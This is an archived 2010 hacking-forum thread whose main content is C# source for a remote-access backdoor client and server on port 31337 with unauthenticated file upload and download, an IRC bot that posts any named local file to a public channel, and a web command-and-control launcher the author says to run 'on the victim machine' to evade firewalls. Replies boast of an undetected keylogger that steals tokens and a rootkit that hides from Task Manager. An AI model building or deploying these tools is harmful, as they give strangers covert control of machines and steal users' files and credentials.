// Forum post by JMC31337, June 14, 2010 (edited December 15, 2010):
// "plenty of examples on the net like Chickenbutt said"
//
// NOTE(review): four separate console programs follow (ConnEX client,
// ConnEX server, an IRC bot and a web-polling launcher). Each keeps its own
// namespace and `using` block so it can be cut out and built on its own; as
// a single file they clash on multiple Main entry points. Nothing in any of
// them authenticates the peer or validates the paths it is handed over the
// network -- the comments below describe what the code does, not endorse it.

//JMC31337//ConnEX//CLIENT
namespace Client
{
    using System;
    using System.Collections.Generic;
    using System.Text;
    using System.IO;
    using System.Net;
    using System.Net.Sockets;

    /// <summary>
    /// Interactive console that connects to a ConnEX server on TCP 31337 and
    /// forwards typed commands. "upload"/"download" carry a file as one hex
    /// string; every other line is written to the socket verbatim.
    /// Protocol (from this file): "upload &lt;drive&gt; &lt;file&gt; &lt;dir&gt; &lt;name&gt;",
    /// "download &lt;drive&gt; &lt;file&gt; &lt;dir&gt; &lt;name&gt;", "Exit".
    /// </summary>
    class Program
    {
        /// <summary>
        /// Upper-case hex pairs with no separator -- identical output to
        /// appending each byte's "X2" form. Doubles the payload size on the wire.
        /// </summary>
        private static string ToHexPairs(byte[] data)
        {
            return BitConverter.ToString(data).Replace("-", "");
        }

        /// <summary>
        /// Inverse of ToHexPairs. An odd-length or non-hex string throws
        /// (Substring / Convert.ToByte); callers swallow that exception.
        /// </summary>
        private static byte[] FromHexPairs(string hex)
        {
            int length = hex.Length;
            byte[] decoded = new byte[length / 2];
            for (int pos = 0; pos < length; pos += 2)
            {
                decoded[pos / 2] = Convert.ToByte(hex.Substring(pos, 2), 16);
            }
            return decoded;
        }

        /// <summary>
        /// Handles "upload drive file dir name": reads the local file
        /// drive+file, sends the command line, then the hex body, then waits
        /// for one reply. Parameter-count and existence errors are reported on
        /// the console; anything else is silently swallowed.
        /// </summary>
        private static void SendFile(Stream wire, Encoding ascii, string cmd)
        {
            string[] parts = cmd.Split(' ');
            try
            {
                if (parts.Length != 5 || parts[4].Equals(""))
                {
                    Console.WriteLine("Invalid Params!");
                    return;
                }

                Console.WriteLine("Upload CMD TEST");
                Console.WriteLine("CMD:" + parts[0]);
                Console.WriteLine("DRIVE:" + parts[1]);
                Console.WriteLine("FILE:" + parts[2]);
                Console.WriteLine("2DIR:" + parts[3]);
                Console.WriteLine("2FILE:" + parts[4]);
                Console.Write("Press Any Key to SEND");
                Console.ReadLine();

                // Drive and file are simply concatenated; no path validation.
                string localPath = parts[1] + parts[2];
                if (!File.Exists(localPath))
                {
                    Console.WriteLine("Local File Does Not Exist!");
                    return;
                }
                Console.WriteLine("Local File Exist!");

                try
                {
                    // NOTE(review): the reader/stream are never closed here, so
                    // the handle stays open until finalization (preserved).
                    FileStream fs = new FileStream(localPath, FileMode.Open, FileAccess.Read);
                    BinaryReader fileReader = new BinaryReader(fs);
                    long size = new FileInfo(localPath).Length;
                    // (int) cast: files over 2 GiB would wrap the requested count.
                    byte[] content = fileReader.ReadBytes((int)size);

                    // Two separate writes: the command line, then the hex body.
                    // Nothing delimits them, so the server relies on them arriving
                    // as two distinct Receive() results.
                    byte[] header = ascii.GetBytes(cmd);
                    wire.Write(header, 0, header.Length);
                    byte[] hexBody = ascii.GetBytes(ToHexPairs(content));
                    wire.Write(hexBody, 0, hexBody.Length);

                    // Print whatever the server answers with (one Read, at most 99999 bytes).
                    byte[] reply = new byte[99999];
                    int got = wire.Read(reply, 0, reply.Length);
                    Console.WriteLine(ascii.GetString(reply, 0, got));
                }
                catch (Exception)
                {
                    Console.WriteLine("ERROR");
                }
            }
            catch (Exception)
            {
                // Swallowed, as in the original.
            }
        }

        /// <summary>
        /// Handles "download drive file dir name": sends the command, expects a
        /// status line and then a hex body from the server, decodes it and
        /// writes dir+name locally.
        /// </summary>
        private static void FetchFile(Stream wire, Encoding ascii, string cmd)
        {
            string[] parts = cmd.Split(' ');
            try
            {
                if (parts.Length != 5 || parts[4].Equals(""))
                {
                    Console.WriteLine("Invalid Params!");
                    return;
                }

                // The banner says "Upload" here too -- a copy/paste artefact in
                // the original that this rewrite keeps.
                Console.WriteLine("Upload CMD TEST");
                Console.WriteLine("CMD:" + parts[0]);
                Console.WriteLine("From DRIVE:" + parts[1]);
                Console.WriteLine("From FILE:" + parts[2]);
                Console.WriteLine("2 Local DIR:" + parts[3]);
                Console.WriteLine("2 Local FILE:" + parts[4]);
                Console.Write("Press Any Key to RECEIVE");
                Console.ReadLine();

                byte[] header = ascii.GetBytes(cmd);
                wire.Write(header, 0, header.Length);

                // First reply: the server's status text ("Receiving File!" or
                // "File Does Not Exist!").
                byte[] status = new byte[99999];
                int statusLen = wire.Read(status, 0, status.Length);
                Console.WriteLine(ascii.GetString(status, 0, statusLen));

                // Second reply: the hex body. A single Read is assumed to hold
                // all of it; larger files are silently truncated. If the server
                // reported the file missing, it sends nothing more and this Read
                // blocks (see the server's download branch in this file).
                byte[] hexBuf = new byte[99999];
                int hexLen = wire.Read(hexBuf, 0, hexBuf.Length);
                string hexBody = ascii.GetString(hexBuf, 0, hexLen);
                Console.WriteLine(hexBody);

                byte[] content = FromHexPairs(hexBody);
                // OpenOrCreate does not truncate: a shorter file leaves the old
                // tail of an existing file in place.
                BinaryWriter sink = new BinaryWriter(new FileStream(parts[3] + parts[4], FileMode.OpenOrCreate));
                sink.Write(content);
                sink.Close();
                Console.WriteLine("FILE RECEIVED!");
            }
            catch (Exception)
            {
                // Swallowed, as in the original.
            }
        }

        /// <summary>
        /// Entry point: prompts for the server IP, connects on 31337, then
        /// loops over console input until "Exit" or a socket error
        /// (both terminate the process with exit code 111).
        /// </summary>
        static void Main(string[] args)
        {
            const int port = 31337;
            string downloadVerb = "download";
            string uploadVerb = "upload";
            Encoding ascii = new ASCIIEncoding();

            Console.WriteLine("ConnEX Admin TOOL (CLIENT) Started");
            Console.WriteLine("Enter IP address: ");
            string serverIp = Console.ReadLine();

            try
            {
                TcpClient link = new TcpClient(serverIp, port);
                if (!link.Connected)
                {
                    return;
                }

                try
                {
                    Stream wire = link.GetStream();
                    string cmd;
                    do
                    {
                        cmd = Console.ReadLine();
                        if (cmd == "Exit")
                        {
                            Console.WriteLine("Telling Server to Stop, Press Any Key");
                            Console.ReadLine();
                            byte[] bye = ascii.GetBytes(cmd);
                            wire.Write(bye, 0, bye.Length);
                            link.Close();
                            System.Environment.Exit(111);
                        }
                        // A null cmd (EOF on stdin) throws on StartsWith and is
                        // handled by the catch below, so the `while` guard is
                        // never the path that ends the loop.
                        else if (cmd.StartsWith(uploadVerb))
                        {
                            SendFile(wire, ascii, cmd);
                        }
                        else if (cmd.StartsWith(downloadVerb))
                        {
                            FetchFile(wire, ascii, cmd);
                        }
                        else
                        {
                            // Anything else is relayed raw ("msg ...", "PopCDOpen", ...).
                            byte[] raw = ascii.GetBytes(cmd);
                            wire.Write(raw, 0, raw.Length);
                        }
                    } while (cmd != null);
                }
                catch (Exception)
                {
                    link.Close();
                    System.Environment.Exit(111);
                }
            }
            catch (Exception)
            {
                Console.WriteLine("YOUR NOT ON A NETWORK or SERVER UNREACHABLE!");
                Console.WriteLine("Press Any Key");
                Console.ReadLine();
            }
        }
    }
}

//JMC31337//ConnEX//SERVER
namespace Serv
{
    using System;
    using System.Collections.Generic;
    using System.Text;
    using System.IO;
    using System.Net;
    using System.Net.Sockets;
    using System.Runtime.InteropServices;

    /// <summary>
    /// Single-client listener on TCP 31337. Accepts the first connection and
    /// executes whatever it sends: eject/close the CD tray, show a message
    /// box, write a file anywhere the process can write, or send back any
    /// readable file. There is no authentication, no encryption and no path
    /// restriction anywhere in this class -- anyone who can reach the port
    /// gets all of it.
    /// </summary>
    class Program
    {
        [DllImport("winmm.dll")]
        static extern Int32 mciSendString(String command, StringBuilder buffer, Int32 bufferSize, IntPtr hwndCallback);

        [DllImport("user32.dll", CharSet = CharSet.Auto)]
        private static extern int MessageBox(int hWnd, String text, String caption, uint type);

        /// <summary>Upper-case hex pairs, no separator (equals per-byte "X2").</summary>
        private static string ToHexPairs(byte[] data)
        {
            return BitConverter.ToString(data).Replace("-", "");
        }

        /// <summary>
        /// Decodes hex pairs; odd length or non-hex input throws and the
        /// callers swallow it.
        /// </summary>
        private static byte[] FromHexPairs(string hex)
        {
            int length = hex.Length;
            byte[] decoded = new byte[length / 2];
            for (int pos = 0; pos < length; pos += 2)
            {
                decoded[pos / 2] = Convert.ToByte(hex.Substring(pos, 2), 16);
            }
            return decoded;
        }

        /// <summary>
        /// "upload drive file dir name": reads ONE more datagram-sized chunk
        /// from the socket as the hex body and writes it to dir+name -- a path
        /// chosen entirely by the remote side. Acknowledges with
        /// "File Upload Completed!". Any failure is silent.
        /// </summary>
        private static void ReceiveUpload(Socket sock, Encoding ascii, string cmd)
        {
            string[] parts = cmd.Split(' ');
            try
            {
                byte[] ack = ascii.GetBytes("File Upload Completed!");
                // Echo the five fields; fewer than five throws IndexOutOfRange
                // here, before the body is ever read.
                Console.WriteLine(parts[0]);
                Console.WriteLine(parts[1]);
                Console.WriteLine(parts[2]);
                Console.WriteLine(parts[3]);
                Console.WriteLine(parts[4]);

                // One Receive (max 99999 bytes) is treated as the whole body;
                // bigger transfers are truncated and the remainder surfaces as
                // the next "command".
                byte[] inbox = new byte[99999];
                int got = sock.Receive(inbox, inbox.Length, 0);
                string hexBody = ascii.GetString(inbox, 0, got);
                byte[] content = FromHexPairs(hexBody);

                // OpenOrCreate does not truncate an existing file.
                BinaryWriter sink = new BinaryWriter(new FileStream(parts[3] + parts[4], FileMode.OpenOrCreate));
                sink.Write(content);
                sink.Close();

                Console.WriteLine(hexBody);
                sock.Send(ack);
            }
            catch (Exception)
            {
                // Swallowed, as in the original.
            }
        }

        /// <summary>
        /// "download drive file dir name": sends "Receiving File!" followed by
        /// the hex of drive+file, or "File Does Not Exist!" alone. Note the
        /// client in this file always performs two reads, so the single-message
        /// miss path leaves it blocked.
        /// </summary>
        private static void ServeDownload(Socket sock, Encoding ascii, string cmd)
        {
            string[] parts = cmd.Split(' ');
            try
            {
                Console.WriteLine(parts[0]);
                Console.WriteLine(parts[1]);
                Console.WriteLine(parts[2]);
                Console.WriteLine(parts[3]);
                Console.WriteLine(parts[4]);

                string path = parts[1] + parts[2];
                if (!File.Exists(path))
                {
                    sock.Send(ascii.GetBytes("File Does Not Exist!"));
                    return;
                }

                sock.Send(ascii.GetBytes("Receiving File!"));
                try
                {
                    // Handle is never closed (preserved from the original).
                    FileStream fs = new FileStream(path, FileMode.Open, FileAccess.Read);
                    BinaryReader fileReader = new BinaryReader(fs);
                    long size = new FileInfo(path).Length;
                    byte[] content = fileReader.ReadBytes((int)size);
                    sock.Send(ascii.GetBytes(ToHexPairs(content)));
                }
                catch (Exception)
                {
                    Console.WriteLine("ERROR");
                }
            }
            catch (Exception)
            {
                // Swallowed, as in the original.
            }
        }

        /// <summary>
        /// Binds to the first address of the local host entry, waits for one
        /// client, then dispatches commands forever. "Exit" or any socket
        /// exception ends the process with exit code 111.
        /// </summary>
        static void Main(string[] args)
        {
            const int port = 31337;
            string msgVerb = "msg";
            string uploadVerb = "upload";
            string downloadVerb = "download";
            Encoding ascii = new ASCIIEncoding();
            byte[] inbox = new byte[99999];

            // Dns.Resolve is obsolete; with an empty name it presumably returns
            // the local machine's own entry -- TODO confirm on the target runtime.
            IPHostEntry self = Dns.Resolve("");
            // Round-trips the address through text exactly as the original did.
            IPAddress bindAddr = IPAddress.Parse(self.AddressList[0].ToString());
            TcpListener listener = new TcpListener(bindAddr, port);

            Console.WriteLine("Server IP: " + bindAddr);
            Console.WriteLine("Port: " + port);
            Console.WriteLine("Press Any Key To Continue");
            Console.WriteLine("---------------------------");
            Console.ReadLine();
            Console.WriteLine("ConnEX Admin Tool (Server) Started");

            listener.Start();
            Socket sock = listener.AcceptSocket();
            sock.Blocking = true;
            if (!sock.Connected)
            {
                return;
            }

            while (true)
            {
                try
                {
                    // A zero-length Receive (peer closed) yields "" which falls
                    // through to the echo branch, so the loop appears to spin
                    // rather than exit on disconnect.
                    int got = sock.Receive(inbox, inbox.Length, 0);
                    string cmd = ascii.GetString(inbox, 0, got);

                    switch (cmd)
                    {
                        case "Exit":
                            System.Environment.Exit(111);
                            break;
                        case "PopCDOpen":
                            mciSendString("set CDAudio door open", null, 0, IntPtr.Zero);
                            break;
                        case "PopCDClose":
                            mciSendString("set CDAudio door closed", null, 0, IntPtr.Zero);
                            break;
                        default:
                            if (cmd.StartsWith(msgVerb))
                            {
                                // "msg <one-word-text>" -> OK/Cancel box (type 1).
                                string[] parts = cmd.Split(' ');
                                if (parts.Length == 2 && !parts[1].Equals(""))
                                {
                                    MessageBox(0, parts[1], "MESSAGE", 1);
                                }
                            }
                            else if (cmd.StartsWith(uploadVerb))
                            {
                                ReceiveUpload(sock, ascii, cmd);
                            }
                            else if (cmd.StartsWith(downloadVerb))
                            {
                                ServeDownload(sock, ascii, cmd);
                            }
                            else
                            {
                                // Unknown input is just echoed to the server console.
                                System.Console.WriteLine(cmd);
                            }
                            break;
                    }
                }
                catch (Exception)
                {
                    sock.Close();
                    System.Environment.Exit(111);
                }
            }
        }
    }
}

// Author's commented-out fragment that followed the server listing:
/*try { Directory.CreateDirectory(@"" + ftext[3]); } catch (Exception e) { Console.WriteLine("Either You Dont Have Access Permission Or Directory Could Not Be Created"); }*/

namespace Bot
{
    using System;
    using System.Collections.Generic;
    using System.Linq;
    using System.Text;
    using System.Net;
    using System.Net.Sockets;
    using System.IO;

    /// <summary>
    /// Minimal IRC bot: joins #testtest on irc.dal.net and reads any local
    /// file named in a channel line containing "read hex" / "read plain",
    /// posting its contents back to the channel as NOTICEs. Every raw server
    /// line is matched, so any channel member (or the server itself) can
    /// trigger it. There is no PING handling in this loop.
    /// </summary>
    class Program
    {
        /// <summary>WriteLine followed by Flush, which the original did in pairs.</summary>
        private static void Send(StreamWriter writer, string line)
        {
            writer.WriteLine(line);
            writer.Flush();
        }

        /// <summary>
        /// "read hex": the sixth space-separated token of the raw line is
        /// opened as a file; each text line is appended (as lower-case hex of
        /// the UTF-16 char values) to a running buffer that is NEVER reset, so
        /// every NOTICE repeats all hex sent so far. One NOTICE per line,
        /// three seconds apart.
        /// </summary>
        private static void DumpFileAsHex(StreamWriter writer, string line)
        {
            Console.WriteLine("HERE IT IS!");
            string[] tokens = line.Split(' ');
            Send(writer, "NOTICE #testtest BOT found file " + tokens[5]);
            Send(writer, "NOTICE #testtest BOT listing file contents in HEX");

            StreamReader file = new StreamReader(tokens[5]);
            string text;
            string hex = null;
            while ((text = file.ReadLine()) != null)
            {
                foreach (char c in text)
                {
                    hex += ((uint)c).ToString("x2");
                }
                Send(writer, "NOTICE #testtest " + hex);
                System.Threading.Thread.Sleep(3000);
            }
            file.Close();
        }

        /// <summary>
        /// "read plain": same trigger shape, but each file line is posted
        /// verbatim, one NOTICE every three seconds.
        /// </summary>
        private static void DumpFilePlain(StreamWriter writer, string line)
        {
            Console.WriteLine("HERE IT IS!");
            string[] tokens = line.Split(' ');
            Send(writer, "NOTICE #testtest BOT found file " + tokens[5]);
            Send(writer, "NOTICE #testtest BOT listing file contents in plaintext");

            StreamReader file = new StreamReader(tokens[5]);
            string text;
            while ((text = file.ReadLine()) != null)
            {
                Send(writer, "NOTICE #testtest " + text);
                System.Threading.Thread.Sleep(3000);
            }
            file.Close();
        }

        /// <summary>
        /// Connects, registers as BotHOUND, joins the channel and dispatches
        /// on every received line. When the server closes the stream the
        /// outer while(true) re-enters ReadLine on the closed reader.
        /// </summary>
        static void Main(string[] args)
        {
            string server = "irc.dal.net";
            int port = 6667;
            string userLine = "USER BotHOUND 8 * :I'm a lil C# irc bot";
            string nick = "BotHOUND";
            string channel = "#testtest";

            TcpClient irc = new TcpClient(server, port);
            NetworkStream stream = irc.GetStream();
            StreamReader reader = new StreamReader(stream);
            StreamWriter writer = new StreamWriter(stream);

            Send(writer, userLine);
            Send(writer, "NICK " + nick);
            Send(writer, "JOIN " + channel);

            while (true)
            {
                string line;
                while ((line = reader.ReadLine()) != null)
                {
                    Console.WriteLine(line);
                    if (line.EndsWith("bot die"))
                    {
                        Send(writer, "NOTICE #testtest BOT shut down sequence initiated");
                        System.Environment.Exit(111);
                    }
                    else if (line.Contains("read hex"))
                    {
                        DumpFileAsHex(writer, line);
                    }
                    else if (line.Contains("read plain"))
                    {
                        DumpFilePlain(writer, line);
                    }
                }
                writer.Close();
                reader.Close();
                irc.Close();
            }
        }
    }
}

// Author's introduction to the last program, verbatim:
// "And finally for Web Command and Control, have a website setup to feed a
// <html_NOTPEAD> in its index3.html page... run this on the victim machine
// and Notepad will spawn, no big deal really, EXCEPT that ZoneAlarm and
// MCSFT Firewall wont ALERT the user to anything..."
//
// NOTE(review): the code compares against "<html_NOTEPAD>" (the prose's
// "NOTPEAD" is a typo). The firewall claim is the author's and is not
// something this code demonstrates -- it is a plain outbound HTTP GET. What
// the code does show: the URL, the trigger string and the launched binary
// are all fixed constants, and DefaultCredentials means the process's
// Windows logon credentials may be offered if that server challenges for
// authentication.
namespace WebGet
{
    using System;
    using System.IO;
    using System.Net;
    using System.Text;

    /// <summary>
    /// Fetches a hard-coded URL once and, if the first line of the body is
    /// exactly "&lt;html_NOTEPAD&gt;", starts C:\Windows\notepad.exe.
    /// </summary>
    class Webget
    {
        public static void Main()
        {
            WebRequest request = WebRequest.Create("http://www.firewal.bypass.com/index3.html");
            // Uses the current logon session's credentials if the server asks.
            request.Credentials = CredentialCache.DefaultCredentials;
            WebResponse response = request.GetResponse();
            Console.WriteLine(((HttpWebResponse)response).StatusDescription);

            // Only the first line of the body matters.
            StreamReader body = new StreamReader(response.GetResponseStream());
            string firstLine = body.ReadLine();
            Console.WriteLine(firstLine);
            Console.ReadLine();
            body.Close();
            response.Close();

            if (firstLine != "<html_NOTEPAD>")
            {
                return;
            }

            string workingDirectory = "C:\\Windows";
            try
            {
                System.Diagnostics.Process notepad = new System.Diagnostics.Process();
                notepad.StartInfo.CreateNoWindow = true;
                notepad.StartInfo.WorkingDirectory = workingDirectory;
                notepad.StartInfo.FileName = workingDirectory + "\\" + "notepad.exe";
                notepad.StartInfo.Arguments = null;
                notepad.EnableRaisingEvents = true;
                notepad.StartInfo.UseShellExecute = false;
                notepad.Start();
            }
            catch (Exception)
            {
                // Launch failures are ignored, as in the original.
            }
        }
    }
}
chickenbutt Posted August 25, 2010 Posted August 25, 2010 (edited) There are a lot of these on the net, mostly in Delphi, .NET, and VB6. I could kill this with group policy, or just use an AV with HIPS, which is pretty much all of them now. I have something that is nothing more than an exe and a dll that doesn't get detected by RKU 3.8 or any up-to-date HIPS, but can keylog anything and connect back through even process-restricted firewalls. It also doesn't disable anything or show in Task Manager, and is only ring3. It can also steal tokens without ring0. Uses 0 exploits. I only use IRC too, though; I don't write malware, which is why I don't bother implementing DNS fluxing or something. Edited August 25, 2010 by chickenbutt
JMC31337 Posted December 15, 2010 Author Posted December 15, 2010 (edited) Quoting chickenbutt: There are a lot of these on the net, mostly in delphi, .net, and vb6. I could kill this with group policy, or just use a AV with HIPS which is pretty much all of them now. I have something that is nothing more than a exe and dll that doesn't get detected by RKU 3.8 or any up-to-date HIPS, but can keylog anything and connect back through even process-restricted firewalls. Also doesn't disable anything or show in taskmanager, and is only ring3. It can also steal tokens without ring0. uses 0-exploits. I only use IRC too though, I don't write malware which is why I don't bother implementing DNS fluxing or something. — true.. created a rootkit with http://www.vijaymukhi.com/security/rootkit/devicedriverhidingprograms1.htm and it hid itself from Task Manager on XP SP3. Keep in mind that with the new SDK I couldn't compile the strnicmp and had to use strcmp "exename.exe" instead. As far as a TCP/IP rootkit filter goes, I haven't tried one yet... anyone know if that is how these drivers get past the firewalls?? Edited December 15, 2010 by JMC31337